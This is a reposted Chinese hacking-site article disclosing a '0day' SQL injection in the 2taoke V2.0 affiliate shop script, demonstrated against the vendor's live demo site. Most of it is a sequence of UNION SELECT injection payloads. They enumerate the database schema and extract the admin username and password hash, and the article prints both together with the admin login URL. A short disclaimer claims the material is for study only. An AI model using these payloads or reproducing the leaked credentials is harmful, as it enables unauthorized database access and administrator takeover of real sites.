欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

爱淘客淘宝客系统 V2.0 0day

来源:本站转载 作者:佚名 时间:2010-05-14 TAG: 我要投稿
以官方演示版(http://demo.2taoke.com)为例:此脚本程序存在一个注入漏洞,考虑到官方,具体哪个点暂时不说。 构造下面注入语句: 





?id=-999.9%20UNION%20ALL%20SELECT%20(SELECT%20concat(0x7e,0x27,count(table_name),0x27,0x7e)%20FROM%20information_schema.tables%20WHERE%20table_schema=0x3274616F6B655F64656D6F),2,3-- 




?id=-999.9%20UNION%20ALL%20SELECT%20(select%20concat(0x7e,0x27,Hex(cast(group_concat(table_name)%20as%20char)),0x27,0x7e)%20FROM%20information_schema.tables%20Where%20table_schema=0x3274616F6B655F64656D6F),2,3-- 




?id=-999.9%20UNION%20ALL%20SELECT%20(SELECT%20concat(0x7e,0x27,count(column_name),0x27,0x7e)%20FROM%20information_schema.columns%20WHERE%20table_schema=0x3274616F6B655F64656D6F%20AND%20table_name=0x3274616F6B655F61646D696E),2,3-- 




?id=-999.9%20UNION%20ALL%20SELECT%20(select%20concat(0x7e,0x27,Hex(cast(group_concat(column_name)%20as%20char)),0x27,0x7e)%20FROM%20information_schema.columns%20Where%20table_schema=0x3274616F6B655F64656D6F%20AND%20table_name=0x3274616F6B655F61646D696E),2,3-- 




?id=-999.9%20UNION%20ALL%20SELECT%20(SELECT%20concat(0x7e,0x27,count(*),0x27,0x7e)%20FROM%202taoke_demo.2taoke_admin),2,3-- 




?id=-999.9%20UNION%20ALL%20SELECT%20(SELECT%20concat(0x7e,0x27,Hex(cast(2taoke_admin.adminname%20as%20char)),0x27,0x7e)%20FROM%202taoke_demo.2taoke_admin%20LIMIT%200,1)%20,2,3-- 




?id=-999.9%20UNION%20ALL%20SELECT%20(SELECT%20concat(0x7e,0x27,Hex(cast(2taoke_admin.adminpass%20as%20char)),0x27,0x7e)%20FROM%202taoke_demo.2taoke_admin%20LIMIT%200,1)%20,2,3-- 




最终管理员用户名:2taoke 密码:59f1d6b20e62c684d0f9b566ef1643bd 后台:http://demo.2taoke.com/admin/admin_login.php 
【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载